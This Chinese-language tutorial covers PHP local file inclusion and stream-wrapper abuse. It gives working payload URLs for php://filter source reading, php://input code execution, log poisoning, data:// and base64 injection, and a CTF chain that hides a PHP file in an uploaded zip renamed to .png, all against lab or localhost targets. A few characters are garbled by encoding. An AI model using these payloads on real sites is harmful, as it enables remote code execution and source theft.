文件包含及PHP偽協(xié)議怎么用

今天小編給大家分享一下文件包含及PHP偽協(xié)議怎么用的相關(guān)知識(shí)點(diǎn)，內(nèi)容詳細(xì)，邏輯清晰，相信大部分人都還太了解這方面的知識(shí)，所以分享這篇文章給大家參考一下，希望大家閱讀完這篇文章后有所收獲，下面我們一起來了解一下吧。

文件包含

文件包含漏洞是“代碼注入”的一種。其原理就是注入一段用戶能控制的腳本或代碼，并讓服務(wù)端執(zhí)行?！按a注入”的典型代表就是文件包含。

要想成功利用文件包含漏洞進(jìn)行攻擊，需要滿足以下兩個(gè)條件：

• Web應(yīng)用采用include()等文件包含函數(shù)通過動(dòng)態(tài)變量的方式引入需要包含的文件;

• 用戶能夠控制該動(dòng)態(tài)變量。

常見的導(dǎo)致文件包含的函數(shù)：
PHP:include()、include_once()、require()、require_once()等；
1.php文件包含可以直接執(zhí)行包含文件的代碼，包含的文件格式不受任何限制
在 php 中提供了四個(gè)文件包含函數(shù)：
(1) Require: 找不到被包含的文件時(shí)會(huì)產(chǎn)生致命錯(cuò)誤(E_COMPILE_ERROR)，并停止腳本；
(2) Include：找不到被包含的文件時(shí)只會(huì)產(chǎn)生一個(gè)(E_warinng)，腳本將繼續(xù)執(zhí)行；
(3) Require_once：與 include 類似會(huì)產(chǎn)生警告，區(qū)別是如果文件代碼已經(jīng)被包含，則不會(huì)再次被包含；

PHP偽協(xié)議

php偽協(xié)議，事實(shí)上是其支持的協(xié)議與封裝協(xié)議。而其支持的協(xié)議有：

file:// — 訪問本地文件系統(tǒng)

php:// — 訪問各個(gè)輸入/輸出流(I/O streams)data:// — 數(shù)據(jù)(RFC 2397)zip:// — 壓縮流

all_url_include在php 5.2以后添加,安全方便的設(shè)置(php的默認(rèn)設(shè)置)為:allow_url_fopen=on;all_url_include=off;
allow_url_fopen = On (允許打開URL文件,預(yù)設(shè)啟用)
allow_url_fopen = Off (禁止打開URL文件)
allow_url_include = Off (禁止引用URL文件,新版增加功能,預(yù)設(shè)關(guān)閉)
allow_url_include = On (允許引用URL文件,新版增加功能)

file協(xié)議

file:// 文件系統(tǒng)是 PHP 使用的默認(rèn)封裝協(xié)議，展現(xiàn)了本地文件系統(tǒng)。

使用file://協(xié)議去包含本地的phpinfo.php

http://localhost/www/lfi.php?file=file://F:\phpstudy\phpstudy_pro\WWW\www\phpinfo.php

PHP協(xié)議

php:// 訪問各個(gè)輸入/輸出流（I/O streams），在CTF中經(jīng)常使用的是php://filter和php://input
php://filter用于讀取源碼：
php://input用于執(zhí)行php代碼。

http://localhost/www/lfi.php?file=php://filter/read=convert.base64-encode/resource=./phpinfo.php

php://filter讀取php文件時(shí)候需要base64編碼

php://input

1. allow_url_include = On

php://input + [POST DATA]執(zhí)行php代碼
需要***allow_url_include = On***

http://localhost/www/lfi.php?file=php://input

POST	<?system('ipconfig')?>

2. allow_url_include = Off

不過一般大部分情況下，allow_url_include 為默認(rèn)關(guān)閉狀態(tài)，
就不能包含POST數(shù)據(jù)了，這種情況下可以包含apache日志或者錯(cuò)誤日志記錄

首先需要fuzz大法，爆破出日志的路徑，

為了測(cè)試方便，我先將日志的內(nèi)容清空，方便演示

訪問該網(wǎng)址，通過報(bào)錯(cuò)將代碼寫入日志中
注意：這里要使用burp抓包去訪問，不然代碼會(huì)被url編碼寫入日志，就不能執(zhí)行了
也可以將代碼寫入 user-agent中

http://localhost/www/lfi.php?file=<?php phpinfo();?>

我的日志路徑為：
F:\phpstudy\phpstudy_pro\Extensions\Apache2.4.39\logs\access.log.1631750400

使用file://偽協(xié)議去讀取日志，發(fā)現(xiàn)phpinfo被成功執(zhí)行了

http://localhost/www/lfi.php?file=file://F:\phpstudy\phpstudy_pro\Extensions\Apache2.4.39\logs\access.log.1631750400

zip://協(xié)議

** zip:// & bzip2:// & zlib:// **均屬于壓縮流，可以訪問壓縮文件中的子文件，更重要的是不需要指定后綴名，可修改為任意后綴：jpg png gif xxx等等。

這里分析一個(gè)文件上傳和文件包含結(jié)合的CTF案例

首先分析文件上傳的源代碼

<html><form action="" enctype="multipart/form-data" method="post" name="upload">file:<input type="file" name="file" /><br> <input type="submit" value="upload" /></form><?phpif(!empty($_FILES["file"])){
    echo $_FILES["file"];
    $allowedExts = array("gif", "jpeg", "jpg", "png");
    @$temp = explode(".", $_FILES["file"]["name"]);
    $extension = end($temp);
    if (((@$_FILES["file"]["type"] == "image/gif") || (@$_FILES["file"]["type"] == "image/jpeg")
    || (@$_FILES["file"]["type"] == "image/jpg") || (@$_FILES["file"]["type"] == "image/pjpeg")
    || (@$_FILES["file"]["type"] == "image/x-png") || (@$_FILES["file"]["type"] == "image/png"))
    && (@$_FILES["file"]["size"] < 102400) && in_array($extension, $allowedExts))
    {
        //move_uploaded_file($_FILES["file"]["tmp_name"], "upload/" . $_FILES["file"]["name"]);
        echo "file upload successful!Save in:  " . "upload/" . $_FILES["file"]["name"];
    }
    else
    {
        echo "upload failed!";
    }}echo $_FILES["file"]["tmp_name"];?></html>

分析源代碼發(fā)現(xiàn)，文件上傳采用了白名單限制策略，只能上傳
“gif", “jpeg”, “jpg”, "png"四種后綴名的文件。

分析文件包含的源代碼

<html>Tips: the parameter is file! :) <!-- upload.php --></html><?php
    @$file = $_GET["file"];
    echo $file;
    if(isset($file))
    {
        if (preg_match('/http|data|ftp|input|%00/i', $file) || strstr($file,"..") !== FALSE || strlen($file)>=70)
        {
            echo "<p> error! </p>";
        }
        else
        {
            include($file.'.php');
        }
    }?>

分析文件包含源代碼，發(fā)現(xiàn)限制了部分偽協(xié)議和%00截?cái)?，且在include中自動(dòng)添加了php后綴名，但是沒有限制zip偽協(xié)議。

綜上分析可以發(fā)現(xiàn)，在文件包含中利用zip偽協(xié)議，可以創(chuàng)建test.zip的壓縮包，里面放著test.php的文件。

在文件上傳時(shí)候?qū)⒑缶Y名zip修改為png的后綴名，

test.php中寫入木馬

<?phpphpinfo();?>

如下圖所示

圖片上傳成功之后，利用文件包含和zip://協(xié)議去讀取test.png中的test.php，發(fā)現(xiàn)phpinfo()被執(zhí)行了，說明poc驗(yàn)證成功

http://172.22.32.25:42715/include.php?file=zip://upload/test.png%23test

data://

條件：

allow_url_fopen:on
allow_url_include :on

訪問網(wǎng)址

http://localhost/www/lfi.php?file=data://text/plain,<?php phpinfo();?>

也可以使用base64編碼，防止代碼被過濾掉

file=data://text/plain,base64;PD9waHAgcGhwaW5mbygpPz4=

以上就是“文件包含及PHP偽協(xié)議怎么用”這篇文章的所有內(nèi)容，感謝各位的閱讀！相信大家閱讀完這篇文章都有很大的收獲，小編每天都會(huì)為大家更新不同的知識(shí)，如果還想學(xué)習(xí)更多的知識(shí)，請(qǐng)關(guān)注億速云行業(yè)資訊頻道。